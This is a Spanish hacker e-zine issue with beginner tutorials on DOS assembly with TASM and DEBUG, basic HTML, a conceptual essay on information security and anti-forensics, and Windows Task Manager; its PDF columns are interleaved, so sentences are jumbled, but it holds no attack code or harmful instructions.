MOV DS:[3000],AX ;Luego lo movemos a DS:[3000])) ----------------------------------Ejemplo del uso del
servicio 3DH de la INT 21H (Crear un archivo)*1
--La orden ADD ~ Sumar ((Pe.: add al,02h)) …
Contiene dos parámetros. Su función es sumar el ;Parámetros:
valor del 2do parámetro al 1er parámetro. ;DS:DX = Apuntador al nombre del archivo ASCIIZ
(( add al,02h ~ al+=02h ~ al=al+02h )). ;AL = Modo de acceso
; AL = 0 ~ lectura
--La orden INC ~ Increment ~ Incrementar ((Pe.: inc ; AL = 1 ~ escritura
di)) ; AL = 2 ~ lectura/escritura
Contiene un solo parámetro. Su función es ;Devuelve CF y AX para el manejo de errores;
incrementar el valor del parámetro en 1. ;Éxito ~ CF=0
(( inc di ~ di++ ~ di = di + 1 )) ; AX = descriptor o handle.
;Error ~ CF=1
--La orden CMP ~ Comparar ((Pe.: cmp ax,02Ah)) ; AX = código de error.
Contiene dos parámetros. Su función es comparar el MOV DX,OFFSET ARCHIVO ;Apuntamos al offset de
valor de los dos parámetros. la “variable” ARCHIVO almacenandolo ;en DX
MOV AH,3DH ;Almacenamos el valor 3Dh en AH
--La orden JMP ~ Jump ~ Saltar ((Pe.: jmp etiqueta1)) MOV AL,2 ;Especificamos AL con el valor 2
CUH e-zine 2ª edicion Introducción al ASM

INT 21H ;Ejecutamos la int Luego usamos el TASM para ensamblar el código:

----------------------------------Fin*1

-Nuestro primer programa en ASM:


--Crear un programa que imprima en pantalla un
clásico “HOLA MUNDO!” (También veremos el
servicio 9 de la int 21h)
Lo primero que haremos es crear el código fuente:
-------------------------------HMundo.asm*1
.MODEL SMALL ; Determinamos el modelo de
memoria
.STACK ; Definimos el área de pila
.DATA *Nota: si no se especifica, el codigo objeto (.obj) se
MENS DB "HOLA MUNDO!.$" ; Especificamos la guardara en la carpeta donde se encuentra el
cadena de texto a mostrar ensamblador.
.CODE ; Inicio del código
INI: ; Etiqueta de inicio Si no hay ningún error, continuamos. Ahora debemos
MOV AX,@DATA ; Permite tener acceso a los datos “linkear” el código objeto, esto lo hacemos con
MOV DS,AX ; a través de el registro DS TLINK:
MOV DX,OFFSET MENS ; Prepara para desplegar el
mensaje
MOV AH,9 ; Llama al servicio 9
INT 21H ; de la int 21h para desplegar el texto
MOV AH,4CH ; Llama al servicio 4Ch
INT 21H ; de la int 21h para terminar
END INI ; Cierra la etiqueta de inicio
-------------------------------Fin*1
Luego que ya tenemos el código fuente, debemos
ensamblar el código (teniendo el programa
ensamblador, claro esta), para esto entramos al
intérprete de comandos: *Nota: al igual que TASM, si no se especifica, TLINK
guarda el ejecutable el la carpeta donde se
encuentre el ensamblador.
Ahora, si no hay ningún error, solo resta probar el
programa, esto lo podemos hacer mediante la misma
consola, solo debemos escribir su nombre y oprimir
ENTER:

Luego nos posicionamos en la carpeta donde se


encuentran los archivos del ensamblador (en mi
caso: “D:\TASM\BIN”) Y listo. En la imagen se puede apreciar como
aparece la cadena de texto “HOLA MUNDO!.”

--Utilización del comando DEBUG de Windows para


probar programas:
Windows cuenta con una herramienta de edición y
comprobación de programas, la cual podemos
utilizar para probar programas antes de convertirlos
en ejecutables, esta herramienta es el “debug”. Una
“desventaja” de debug, es que a la hora de codificar
el programa, no contamos con herramientas propias
de un programa ensamblador, tales como la
CUH e-zine 2ª edicion Introducción al ASM

utilización de etiquetas, el uso de variables, etc. Todo


lo debemos hacer mediante posiciones específicas
de memoria.
---Comprobación del programa “HMUNDO”
mediante debug:
Probaremos el programa, que hicimos anteriormente
en TASM, con el comando debug.
----Comandos del debug que usaremos para probar
el programa:

E ~ Enter ~ Introduce datos directamente en la


posición de memoria especificada.
((Pe.: e 0f1e:0000 ‘Texto.$’)) Æ este comando asigna Luego mediante el comando “a” del debug,
la cadena de texto “Texto” en la posición de memoria comenzamos a escribir el codigo del programa:
0f1e:0000

A ~ Assemble ~ Permite introducir el código de


nuestro programa a partir de la dirección
especificada.
((Pe.: a 1024)) Æ este comando indica que el
siguiente código se empezara a escribir desde el
offset 1024 del actual segmento.

G ~ Go Æ sin parámetros, comprueba la porción de


código que se a introducido en la memoria, o a la
posición que se apunte.
Ahora solo resta probarlo mediante el comando “g”
Q ~ Quit Æ Salir de debug del debug:

--Comprobación del programa:


Abrimos el intérprete de comandos, y escribimos
debug seguido de un ENTER

En la imagen se puede apreciar el mismo resultado


obtenido mediante la creación del programa con
TASM.

Lo primero que hay que saber es que en el -Conclusión:


programa (HMUNDO) tenemos un cadena de texto Este tutorial solo pretende ser una introducción a la
que tiene que ser asignada a una posición de majestuosidad de este lenguaje. Es imposible
memoria, como ya no se cuenta con los recursos del explicar la potencia del asm en pocas páginas.
ensamblador, debemos asignar esa cadena de texto
directamente a la memoria, esto lo hacemos con la
*Nota: *1 se refiere a que dicha línea es solo parte
ayuda del comando “e” del
de este tutorial, no se usa a la hora de programar.
debug:
“Pe.:” se refiere a un ejemplo explicativo. Pe.:
~ Por ejemplo
~: Se refiere al significado o a una
equivalencia.

by “The Shadow”
el-hacker.com
CUH e-zine 2ª edicion Arrancando Html

Arrancando HTML By Gallloo

</br> //Esto es un salto de línea

Starting HTML

Formato de texto
Una forma de modificarlo es mediante las etiquetas:
<font></font>
La etiqueta Font nos sirve para darle bastantes
formatos a nuestro texto, sus atributos más usados
son:
• Color
Nos sirve para asignarle un color,
normalmente lo hacemos en hexadecimal.

La pregunta más frecuente, ¿ qué es el HTML ? <Font color=”#00FFFF”>Texto con color</Font>


HTML es un lenguaje de programación web bastante
• Face
sencillo y lo recomiendo para iniciarse en la
programación.
Con este atributo asignamos la fuente del
Es un lenguaje web estático, del lado del cliente , es
texto contenido.
decir , que lo interpreta nuestro navegador ya sea
Firefox , IE, etc…
<Font face=”Arial”>Hola mundo</Font>
Sintaxis <div></div>
El HTML está compuesto por etiquetas que se abren Para un usuario avanzado esta etiqueta es de gran
y cierran de este modo utilidad pero por ahora solo la usaremos para
alinear el texto que ya lo he explicado
<b> Hola mundo </b> //Texto en negrita anteriormente.
<ul><li></li></ul>
Se utiliza “<b>” para abrir y “</b>” para cerrar y
Con esto hacemos una lista con una determinada
delimitar la parte que queda sometida a esas
sangría.
etiquetas.
Estas etiquetas van “unidas de la mano” <ul> sirve
Luego , los atributos de esas etiquetas se ponen al
para definir el bloque donde se va a usar <li> que
principio, en la apertura.
designa un elemento de la lista.
<div align=”center”>Texto que quedará centrado</div>
<ul>
Como habéis visto, align es un atributo, sus valores <li>Elemento1…</li>
son: left, center, justify y right <li>Elemento2…</li>
Hay otras etiquetas que solo constan de una parte, </ul>
pero son poco frecuentes, ejemplo:
En esta parte podría profundizar más pero no me
quiero extender mucho.
CUH e-zine 2ª edicion Arrancando Html

<a></a> <table></table>
Estas etiquetas nos permiten hacer enlaces o Mediante estas etiquetas especificamos que vamos a
hipervínculos hacia otras páginas. definir una tabla.
Con su atributo href especificamos la dirección hacia • width & height
donde nos conducirá. Es exactamente igual que el de las imágenes.

<a href=”www.google.es”>Nombre para clickar</a> <table height=”200” width=”100”>


<tr><td>eyyyyy</td></tr>
</table>
Imágenes
• align
Es el mismo atributo que el de los divs, y
como ya sabéis sirve para alinear la tabla
hacia donde queramos.

<table align=”center” height=”200” width=”100”>


<tr><td>eyyyyy</td></tr>
</table>
• border
Indicamos el grosor del border de la table en
pixels.

<table border=”5”>…
<img />
• bordercolor
Para mostrar una imagen en nuestra página web lo
Definimos el color del borde de la tabla,
hacemos mediante la etiqueta <img />. Sus atributos
como siempre en hexadecimal o con
son:
constantes, por ejemplo: red, black , #000000
• src
, blue…
Indicamos la ruta donde se encuentra la
imagen que queremos mostrar.
<table bordercolor=”red”>…
<img src=”imágenes/img1.jpg” /> • bgcolor
Indicamos el color que tendrá el fondo de la
• width & height
tabla, al igual que antes en hexadecimal o
Define la anchura y altura de tu imagen.
con constantes.
Si no ponemos este atributo nos mostrará la
imagen con sus medidas reales, pero si lo
<table bgcolor=”#000000”>…
escribimos lo hará con las que habeis
indicado. Las medidas las tomará en pixels. Bien, vamos ahora a los “más complicado”. Como
todos bien sabéis las tablas se componen de
<img src=”img1.jpg” width=”100” height=”94” /> columnas y filas, pues eso lo vamos a indicar con las
etiquetas <tr></tr> y <td></td> . Las <td> siempre
• border
están subordinadas a <tr>, vamos a verlo.
Especifica los pixels de borde que tendrá la
<tr></tr>
imagen.
Con estas etiquetas especificamos una fila de la
Por defecto tiene el valor “1” , así que sino
tabla, para que sea una “fila verdadera” y podamos
queremos que nos ponga bordes habrá que
escribir dentro de ella, debe de llevar los <td></td>
ponerlo a “0”.
dentro que es la parte donde pondremos el
contenido. Si queremos poner más filas lo haremos
Si quisiéramos alinear la imagen hacia algún lado lo
repitiendo el mismo proceso. Veamos sus atributos y
haríamos con <div align=”….”></div> Al igual que
de paso algunos ejemplos.
hicimos con el texto.
• bgcolor
Este indica el color de fondo de la fila , ya
Tablas
que es en el <tr>.
<table><tr><td></td></tr></table>
Las tablas es algo un poco más avanzado en html,
<table align=”center”>
por lo que no os preocupéis si no lo entendéis a la
<tr bgcolor=”red”>
primera. Tampoco profundizaré mucho ya que es un
<td>Columna1, Fila1</td><td> Columna2, Fila1</td>
tema bastante extenso.
</tr>
<tr bgcolor=”blue”>
<td>Columna1, Fila2</td><td> Columna2, Fila2</td>
CUH e-zine 2ª edicion Arrancando Html

</tr> página nos aparecerá escrito eso en el text.


</table> Para los checkbox y radio es distinto.
<textarea></textarea>
Como su nombre indica es un text en tamaño gigante
<td></td>
:D. Tiene varias líneas y lo que escribamos en medio
Como dije antes estas etiquetas van subordinadas a
de sus etiquetas equivale al value de los inputs.
<tr>, es decir, que van dentro.
• cols
Estas, indican las columnas que habrá. Su atributo
Expresa el nº de columnas que tendrá el
más utilizado es bgcolor. Veamos algún ejemplo.
textarea.
• rows
<table align=”left”>
Con el definimos el nº de filas.
<tr bgcolor=”red”>
<td bgcolor=”red”><img src=”img1.jpg” /></td>
<form><textarea cols=”20” rows=”8”>
</tr>
texto dentro</textarea></form>
<tr bgcolor=”blue”>
<td>Columna1, Fila2</td><td> Columna2, Fila2</td>
</tr>
</table>
Se podrían ir poniendo más filas y columnas, eso ya
es a gusto de cada uno. Aún quedan varios atributos
más pero son algo más avanzados y es cosa de que
lo busquéis vosotros. Como colspan o rowspan ; ) .
Para comprenderlo mejor deberíais estar
practicando y ver como quedan.
Formularios
<form></form>
Esta parte es la última y la más avanzada de este
artículo. Los formularios se indican con las etiquetas
<form></form> y dentro van las etiquetas de sus
elementos, los cuales veremos ahora. Si no sabéis
absolutamente de nada de PHP , no os van a servir
para mucho, pero bueno. Veamos los únicos
atributos que nos sirven sin PHP :P Colores basicos: nombre y hexadecimal
• action
Bien veámos ahora un ejemplo global de todo lo que
Con este indicamos al “lugar” o página
hemos hecho en el artículo
donde se envían los datos.
• method
<div align=”right”>
Puede tener solo dos valores, “get” o “post”.
<font color=”red”><b>Hola</b></font><br />
Lo voy a explicar aunque como no
<img src=”imagen_1.png” width=”300” border=”3” />
utilizaremos PHP no será necesario.
</div><br />
-GET envía los datos mediante la URL y
<ul>
utilizando variables que son accesibles al
<li>Elemento 1</li>
usuario.
<li>Imagen 1 <img src=”img1.jpg” border=”0” /></li>
-POST manda los datos “ocultamente” , o
</ul><br />
mejor dicho sin mostrarlo en la URL.
<table border=”3” width=”500” height=”500”>
<input />
<tr><td>1,1</td><td>1,2</td></tr>
Con este introduciremos los elementos en nuestro
<tr bgcolor=”#000000”><td>2,1</td><td>2,2</td></tr>
formulario, cuando digo elementos me refiero a
</table><br />
textboxes, botones, checkbox … Solo explicaré los
<div align="center”>
atributos necesarios.
<a href=”www.google.es”>Soy un enlace</a></div><br />
• type
<form action=”mailto:correo@correo.com” method=”post”>
Indicamos el tipo de elemento a añadir. Ej:
<input type=”text” size=”9” value=”nombre” /><br />
text , submit, button, password, checkbox,
<input type=”checkbox” /><br />
option…
<input type=”password” size=”9” /><br />
• size
<textarea cols=”20” rows=”6”>texto, ey</textarea>
Definimos el tamaño de ese elemento.
<input type=”submit” value=”Enviar” />
• value
</form>
Es el valor que tendrá por defecto. Si lo
ponemos en un text cuando abramos la Esto es todo, hasta la próxima edición de parte de
gallloo ;- )
CUH e-zine 2ª edicion Arrancando Html

Html cheat sheet


CUH e-zine 2ª edicion Seguridad informática

Seguridad informática By Aleksteir

Como muchos saben la seguridad es un concepto


que debe ir plenamente ligado a cualquier tipo de
sistema informático, al desarrollar algún tipo de
sistema de información, debemos tener siempre en
cuenta, aquellos aspectos, en cuanto a la seguridad
En internet existen sitios que publican
de los datos y del sistema mismo se refieren, por que
vulnerabilidades y fallas que a diario se encuentran
siempre habrá alguien dispuesto a quebrantar o
en aplicaciones y en sitios, por parte de personas
estará en constante búsqueda para encontrar la
que dedican su vida a ello, algunos lo hacen por
forma de vulnerar aquello en lo cual nosotros nos
obtener fama o dinero; y es algo que nos hace
hemos esforzado en salvaguardar y que va implícito
reflexionar y reconocer que la inseguridad es una
a el perfecto funcionamiento de el sistema como tal,
fea e insistente compañera de viaje para todos
y que si tenemos en cuenta también, que nosotros
aquellos que son responsables de la seguridad
cobramos por eso o vivimos de ello, entonces nos
informática en todo tipo de empresas y
veremos afectados a un grado profundo, pudiendo
organizaciones, bien sea en cuanto a desarrollo de
incluso poner en duda el concepto que los demás
aplicaciones o en cuanto a seguridad de los datos
tengan de nuestros conocimientos, experiencias, y
críticos, bien sea de entidades publicas o privadas,
del buen nombre, que muchos tratamos de cuidar, al
que dependen netamente de ellos (siendo incluso su
ejecutar o enfrentar cualquier tipo de desarrollo de
mayor activo y por ende el tesoro que mas deben, y
un sistema informático; ante nuestros actuales
se esfuerzan por cuidar), es ahí donde nace la
clientes o ante los que potencialmente podrían estar
necesidad de crear sistemas que posean los
interesados en nuestro trabajo, llevándonos de esta
mecanismos y maneras efectivas para intentar
manera al fracaso intelectual y económico, dando
prevenir al máximo, las intrusiones y las formas de
paso, a una inminente desaparición de esa idea (o
que alguien (ajeno a la administración y al manejo
ilusión) que con tanto ahínco hemos enfrentado
eficiente y seguro de dichos datos, e incluso en el
(incluso ondeándola como nuestra mayor bandera, si
peor de los casos, protegiendo dicha información,
se trata del desarrollo de aplicaciones o programas)
hasta de una posible amenaza interna, por parte de
derrumbando hasta nuestra propia fe en ello. Sin
algún administrador o de alguien que tenga acceso
embargo todo ello, es algo, que de por si, viene
físico a esas personas) pudiera llegar a vulnerar o a
implícito al desarrollo de aplicaciones y de sistemas
tumbar el sistema que para ello se haya tratado de
informáticos, ya que la experiencia ha demostrado
implementar.
que en cuanto informática ( Y en

la vida misma, los hechos así lo demuestran) se


refiere la inseguridad siempre existirá (nada es
100% seguro) y ese será en el futuro uno de los
ítems que mas atención captará por parte de la
comunidad desarrolladora de sistemas informáticos
(incluso los no orientados a la seguridad) ; con esta
introducción empezamos este temilla tan espinoso
como es la seguridad informática y otro concepto
relativamente nuevo como es la informática anti-
forense.
CUH e-zine 2ª edicion Seguridad informática

porqué fue ?, dónde fue?, cuándo fue? y cómo fue?.


Debemos también saber, que esta incesante guerra Y a través de diferentes estrategias, metodologías,
que se lleva cabo en contra de “el lado oscuro” no técnicas y evidencias, que nos ayuden a encontrar las
es algo nuevo, y es que la inseguridad misma quien respuestas a estos interrogantes; no obstante la
arenga y excita constantemente a todos aquellos que terrible audacia y habilidad de los intrusos a veces
de alguna manera trabajamos o dependemos al 100 puede llegar a desconcertarnos, al ver que de una u
% de la seguridad de sistemas informáticos, bien otra forma, intentan alterar o desafiar el
sea aplicada a proveedores, tanto como a usuarios. funcionamiento de el sistema de seguridad
Es por eso que debemos tratar de descubrir e implementado, haciendo mas difícil la tarea de
identificar todas esas interrelaciones (muchas veces indagación para resolver el caso en cuestión.
ocultas) que tienen que ver con alguna falla o Este hecho nos lleva a plantearnos, el hecho de que
vulnerabilidad que tarde o temprano será la causa la inseguridad de la información, radica muchas
de algún tipo de incidente (en la mayoría de los veces en habilidades y practicas anti-forenses
casos: desastroso). Es por ello que debemos tener en (digital anti-forensics), las cuales buscan manosear,
cuenta varios elementos palpables y muy reales enredar o destruir los rastros o evidencias
sobre la seguridad de la información, como relacionadas con el incidente en cuestión, con el fin
concepto plenamente intangible, y que requiere de confundir los hallazgos y los resultados de las
la inseguridad para tener un sentido como tal, investigaciones que para ello se adelanten. Entonces,
asegurando que de esta forma se puedan tanto los investigadores, como los responsables de la
desarrollar estrategias eficientes y prácticas que seguridad, debemos asumir y confrontar, si las
sean eficaces para aumentar al máximo posible los metodologías usadas, realmente son las mas
niveles de seguridad. adecuadas, llegando incluso a replantear nuestro
propio concepto mismo de seguridad y por ende
Teniendo en cuentas los anteriores factores la obligándonos también a reestructurar nuestros
seguridad total nunca será 100 % posible, ya que mapas mentales y de esta forma comprender las
no existe ningún elemento que no esté expuesto a fallas que estamos cometiendo, convirtiéndose en el
situaciones inesperadas e imprevistas, que alteren el fondo, en características y consecuencias propias de
correcto ejercicio del sistema, bien sea de manera un sistema, que en la mayoría de los casos pueden
positiva o negativa. En base a esto, es como se ser muchas mas, de las que en realidad podemos
deben solventar políticas en cuanto a la administrar. Esta es la idea principal de este artículo,
administración de la seguridad, y para ello suele donde se plantean dos conceptos paralelos, pero
recurrirse a el análisis y administración de riesgos, el intrínsecamente ligados: seguridad informática e
cual esta basado: en los procesos que reconocen la informática anti-forense, teniendo como lugar de
presencia de situaciones no previstas y que deben origen y como radio de acción, la actualidad de las
prever de esta forma, poder tomar medidas y organizaciones y sus respectivos procesos, también
controles, que mitiguen estas posibles situaciones. En debemos afrontar esas imprescindibles cuestiones:
la actualidad las prácticas de auditoría, encuentran como nuevos retos; al tener que confrontar las
en la seguridad de la información un ítem distintas técnicas y tácticas de que se valen los
imprescindible, que ofrece a todos aquellos que “quebradores de sistemas”, y darle de esta manera
tienen la responsabilidad de implementar la un sentido mas enfático, mucho mas preciso, y mejor
seguridad, una herramienta para enfrentar y orientado o dirigido, especialmente a las estructuras
contrarrestar la inseguridad propia de los y métodos, que aplicaremos a la seguridad de los
componentes del sistema que gestiona dicha sistemas informáticos, que tratemos de desarrollar.
seguridad. Se hace por ello necesario que la gestión
de seguridad de la información, sea constantemente
revisada y complementada, no solamente para
descubrir las posibles fallas de seguridad, sino
también, para comprender de manera estructural y
sistemática las posibles tensiones existentes entre los
distintos elementos que la conforman. En este
aspecto, las tendencias de la internacionalización y
la realidad de un sistema de información global,
hacen que la seguridad de la información se
convierta en un elemento activo, estratégico y vital
para la gran mayoría de las empresas modernas (y
de las no tan nuevas también).
La seguridad es un elemento subjetivo, es decir
Es aquí donde la inseguridad nos plantea retos
individual a cada sujeto. Cada uno de nosotros tiene
interesantes, al tener que investigar todos los
una manera distinta de analizar y comprender la
incidentes que se llegasen a presentar, y el
seguridad, también poseemos la facultad de analizar
responder a preguntas como: qué fue?, quién fue?,
CUH e-zine 2ª edicion Seguridad informática

y por ende el concepto que se tiene de la seguridad niveles establecidos. La seguridad es impalpable, ya
depende de factores independientes. Por lo tanto es que no radica en los dispositivos de seguridad que
tan valedera, la definición que cualquier persona de se tomen, tampoco en los procedimientos efectuados,
a pie o del común pueda tener, como la de un ni mucho menos en las personas o en los cargos o
especialista en cuestiones técnicas de seguridad, puestos que ellas ejercen. En si, la seguridad es la
pues cada uno ve una realidad distinta, desde su afirmación, de que estamos ante un activo cuyo
propio punto de vista o análisis del sistema. Al manejo no es evidente, ni certero, debido a su
contrario de ello, la seguridad informática es un volatibilidad, y se basa en la percepción externa que
elemento objetivo, ya que hace referencia al objeto, se pueda tener del mismo. Con solo detenernos a
que en cualquier caso es una realidad evidente, observar los mercados financieros, que dependen
sensible y verificable. Es en este aspecto, en que la muchas veces de incertidumbres geopolíticas y que
inseguridad da valor a la esencia misma del análisis pueden llegar a destruir la sensación de seguridad
de riesgos, ya que solo, es por medio de acciones de los inversionistas, conllevando a efectos
que comprueben y verifiquen dicha validez, donde devastadores en los movimientos monetarios y
obtendremos las medidas de los niveles de financieros. En contraposición a lo anterior pero
exposición a posibles riesgos, y así llegar a complementario, podemos afirmar que la
estructurar los controles, para poder tomar las inseguridad es algo muy tangible, podemos detectar
decisiones acertadas, para minimizar, y en algunas el robo, la estafa, los accidentes, las catástrofes, son
veces hasta transferir las fallas; reduciendo el propiedades evidenciables y demostrables, de
impacto que podrían llegar a causar. manera que sabremos a ciencia cierta determinar la
cantidad de los daños ocasionados, bien sea en
cifras o en hechos. Podemos afirmar también que
ello responde a una propiedad emergente de un
sistema (propiedad que nace de la relación entre los
elementos de un sistema y no en particular a un
elemento que lo conforma). Es así, que la seguridad
esta intrínsecamente relacionada con la tecnología,
los procesos y los individuos, convirtiéndose en un
todo coherente y ordenado que depende de el
entendimiento o comprensión de las interrelaciones
existentes, la mayoría de las veces invisibles, en
cuanto a protección de activos se trata. Cabe añadir
que la inseguridad es totalmente inherente a los
Nunca existe un nivel superior relativo a la objetos, una realidad que deber ser descubierta y
seguridad, ya que siempre es posible encontrar analizada para ser enteramente entendida,
alguna medida mejor que la anterior, y todo ello es llevándonos inevitablemente de esta manera, hacia
el fruto del análisis de las medidas de protección, la propia administración de los riesgos. Al tener
que deben estar siendo constantemente evaluadas plena conciencia de nuestra existencia, también
para así comprender, el por que: ¿de que forma no asumimos que estamos expuestos a muchos riesgos,
funciona el sistema?, partiendo de ello es posible de ello se deduce que la inseguridad es inherente a
replantear o implementar nuevas estrategias, que nuestro diario vivir y por tanto, es preciso tomar una
estén constantemente mejorando nuestro actual serias de medidas que nos permitan amortiguar los
sistema de seguridad. Al contario, la inseguridad si impactos causados.
tiene un máximo nivel, por ejemplo: en un seguro de
vida, lo máximo en este caso es la muerte, y en cada
caso se pacta en un valor definido por el comprador,
definiendo de esta manera los ítems que rigen dicho
seguro, es por ello que nace la necesidad de
mantener un nivel de protección, ya que siempre
debemos tratar de cuantificar el nivel de inseguridad
que podemos administrar, siguiendo los niveles que
se basan en las prácticas de seguridad y la dinámica
de los procesos de un determinado tipo de negocio.
Podríamos llegar a establecer un máximo nivel de
exposición o riesgo que quisiéramos asegurar, con
las normas y precauciones que el asegurador
establezca como mínimas, para poder aprobar y
pagar los perjuicios, como fruto de la
materialización del riesgo, más allá de nuestro
debido cuidado y diligencia para mantenerlo en los
CUH e-zine 2ª edicion Seguridad informática

Cuando se trata de moldear o diseñar cualquier tipo veces “desocupados” y que no procuran soluciones o
de objeto o estructura, buscamos que ese algo tenga alternativas para la seguridad, sino que al contrario
las características que perseguimos y que se adapten ocasionan mas daños y problemas de lo que se cree,
a las necesidades que tengamos. De igual forma recordando a cada uno de los protagonistas, que se
cuando deseamos que los activos gocen de deben reconocer que cada sistema de gestión, tiene
seguridad, debemos primero comprender los riesgos una propiedad inherente que se llama inseguridad,
a los cuales está expuesto, para planificar las de la cual no se puede prescindir, al contrario debe
distintas estrategias de seguridad para el caso y así ser el objeto de un mayor análisis, para evidenciar y
lograr un nivel inferior de exposición de dichos entender las posibles fallas..Esto no se logra de la
activos. La inseguridad como tal, no requiere de noche a la mañana, por lo tanto debe recurrir a
esquemas o diseños específicos, se sabe que todos estrategias que puedan variar las rutinas del día a
los objetos en sí mismos la contienen y se puede día para la gestión de la seguridad y de esta forma
manifestar indistintamente, de igual forma se detectar eso que solo los llamados “inquietos”
materializará en el objeto que se examina, pueden ven, entonces se hace necesario poder
aseverándonos que la inseguridad es una propiedad administrar la variedad y conocer la complejidad
inherente a los elementos y advirtiéndonos la manera relativa a la dinámica de la seguridad de cada
de cómo establecer los mínimos ítems de seguridad entidad u organización, sin embargo tarde o
para limitar la materialización de la misma en un temprano las organizaciones serán objeto de errores
escenario con distintos actores y variables. o incidentes de seguridad, que de acuerdo con las
políticas de la empresa, desembocará en
investigaciones y análisis para determinar y
reconstruir los hechos, así también como identificar a
los posibles responsables y los móviles que los
impulsan. Es en estos casos donde la informática
forense tiene su razón de ser, y también es allí donde
la inseguridad materializada se evidencia y los
hechos pueden ser de igual forma muy variados:
exclusión de información, modificaciones de datos,
En conclusión a todo lo planteado hasta acá, se hace inadecuadas prácticas de disposición de medios,
latente en repensar la administración de la entre otras. La computación forense permite a las
seguridad, por una administración de inseguridad, organizaciones adelantar los exámenes requeridos
donde evidenciando cada una de las características por y con los medios tecnológicos, para valorar lo
de ésta última, podamos cambiar las prácticas sucedido, y de manera técnica o científica, explicar
actuales de seguridad informática, focalizada a lo que pudo suceder, siempre basado en hechos
objetos, para reconocer una nueva política basada reales y en evidencia plenamente verificable. De ahí
en las relaciones que generan las perspectivas que las habilidades de los inquietos también prevé la
gerenciales, los procesos económicos y la actual forma de distorsionar la realidad para “conducir la
infraestructura computacional, como una rica fuente investigación” hacia donde ellos lo han planificado y
que complementa el entendimiento y la comprensión no hacia la verdad de lo acaecido. Este hecho
de las vulnerabilidades en los sistemas. profundiza en el cómo funcionan las herramientas
forenses, sus alcances y limitaciones sobre las
Informática anti- forense mismas, y de esta forma detallar alternativas que
eviten posibles fallas y dudas sobre su adecuado
funcionamiento y uso. Een este escenario es donde
los investigadores forenses en informática entran en
desventaja, pues cualquier hallazgo que se obtenga
con dichas herramientas, bien sea computacionales o
físicas, ya que serán refutadas como objeto de duda
por parte de la defensa del acusado. Es por eso que
la computación anti-forense es un reto constante
para la seguridad de la información y su posterior
desarrollo. Ya que al estudiar las pruebas y ataques
que adelantan las mentes inquietas, se producen y
La mente de algunos “inquietos” muchas veces llega establecen nuevas políticas y propuestas que
a esferas de lo que el software o hardware puedan permiten a los desarrolladores, afinar sus futuras
establecer. Estos personajes creativos y desafiantes aplicaciones y fortalecer sus aplicaciones vigentes.
ponen a prueba, la representación relativa y Se puede afirmar que la fortaleza de una
enfocada de los encargados de la seguridad. Se herramienta forense, se mide en las constantes dudas
dice en la industria informática que estos “inquietos” y fallas que tiene que resolver para confrontar las
tienen mucho tiempo al estar en su mayoría de las observaciones y ataques llevado a cabo por las
CUH e-zine 2ª edicion Seguridad informática

llamadas mentes inquietas. prevenir ataques y solventar e implementar mejores


Y la computación anti-forense nos invita a “ver con sistemas de seguridad informática, la vulnerabilidad
otros ojos” lo que la realidad nos dice, enrutandonos en estos casos no es tomada como una debilidad o
y orientándonos en como debemos actuar, y sobra carencia de control, es simplemente se hace preciso
decir que es una compañera estratégica y reconocer que aun no hemos acabado de
fundamental que nos obliga a repensar la seguridad comprender la variedad que puede alcanzar el
de la información, pero mal utilizada, es una sistema que hemos creado, también se debe
amenaza permanente que nos exige estar alerta en recalcar, que estas medidas deben ser continuas y
todo momento para tratar de deducir y bloquear los flexibles, para poder entender y moldear el sistema y
movimientos de los intrusos. llevarlo a la toma de decisiones eficientes en cuanto
La informática anti-forense nos conlleva a proyectos a las posibles situaciones de fallo y no a una
como Metasploit Project http://www.metasploit.com posición inflexible, que solo se rige a cierto tipo de
igual forma también las revistas Phrack incidente únicamente. En otras palabras se debe
http://www.phrack.org , insecurity magazine tener la mente abierta, ante el ramillete de
http://www.insecuremag.com y muchos mas posibilidades que se pudieran presentar, además de
esfuerzos internacionales, que llevan como bandera: una insistencia constante, para así, poder enfrentar
establecer un referente real y preciso sobre la nuevas propuestas y estrategias creativas, que
seguridad de la información. conlleven a mejorar la gestión de la seguridad
informática. Ignorar o renunciar al aprendizaje de
la inseguridad, es cortar el correcto flujo de la
seguridad y por ende cercenar su futuro, de igual
forma es negar la dinámica misma del desarrollo y
las nuevas facetas para afrontar las nuevas formas
de protección, que no pasan de ser el entendimiento
mismo de la inseguridad materializadas, en una
técnicas, una herramientas o el desarrollo de un
sistema de información como tal.

Después de efectuar de un ejercicio de valoración


de seguridad, ya sea por medio de ataques
controlados o por la puesta a prueba de
vulnerabilidades contra la infraestructura de las
entidades y organizaciones (Publicas o privadas),
siempre queda un mal sentir en el ambiente, ya que
se contraponen, por un lado los esfuerzos y
gestiones efectuados por el encargado de la
seguridad, que ve como sus esfuerzos no son
suficientes para contrarrestar los ataques o fallos y
también ve como se refuerzan los mecanismos al ver
que su sistema se doblegan ante la propia
inseguridad del sistema. Por otro lado también
queda un aire de satisfacción, por parte de los
consultores, al haber descubierto las fallas y
evidenciar las falencias en la aplicación de los
procedimientos y acciones en cuanto al área de
seguridad se refieren. Respecto a este contraste,
nunca se debe tratar de esconder la primera y
resaltar la segunda, seria un autoengaño hacerlo; es
por eso que la mayoría de las organizaciones
reconocen en las vulnerabilidades y en la mayoría
de los casos también que recurren (Contratan) a
aquellas mentes inquietas como una de sus fuentes
de aprendizaje, ya que al estar de parte, de quienes
por regla, tratan de romper los sistemas, logrando a By Aleksteir
corto y mediano plazo encontrar las formas de
CUH e-zine 2ª edicion Herramientas Administrativas

Herramientas administrativas By Aleksteir

En este articulo veremos la forma de usar varias


herramientas administrativas, muy importantes para
la correcta optimización del sistema, tal como son:
Usar la herramienta restaurar el sistema, el
administrador de tareas, y otras cositas mas, espero
que les sirva de guía, para aquellos que recién
empiezan a cacharrear con el windows, he de decir
que la mayoría de las cosas aquí expuestas son
aplicables preferiblemente a XP profesional. Primero
que todo vamos a ver el administrador de tareas,
esta herramienta esta compuesta por una Interfax
grafica y consta de unas pestañas y de un menú, es
muy fácil de usar, la primer pestaña es la de las
aplicaciones que se encuentran trabajando en primer
plano:
Cuando tenemos un programa atrancado o que no
responde, una magnifica opción , es escoger : Ir al
proceso, esa opción nos manda a la siguiente
pestaña, procesos:

Desde esta ventana podemos seleccionar una


aplicación (click derecho) y nos saldrá una menú
contextual que nos da varias opciones:

Con esta opción podemos terminar un determinado


proceso o una tarea en especifico, o establecer la
CUH e-zine 2ª edicion Herramientas Administrativas

prioridad de su uso, o terminar todo el árbol del


proceso:

Pòr ultimo llegamos a la pestaña usuarios, desde


La pestaña rendimiento en la paste posterior nos allí podemos cerrar un sesión, y ver los demás
muestra un osciloscopio que indica los picos de uso usuarios que se encontrasen:
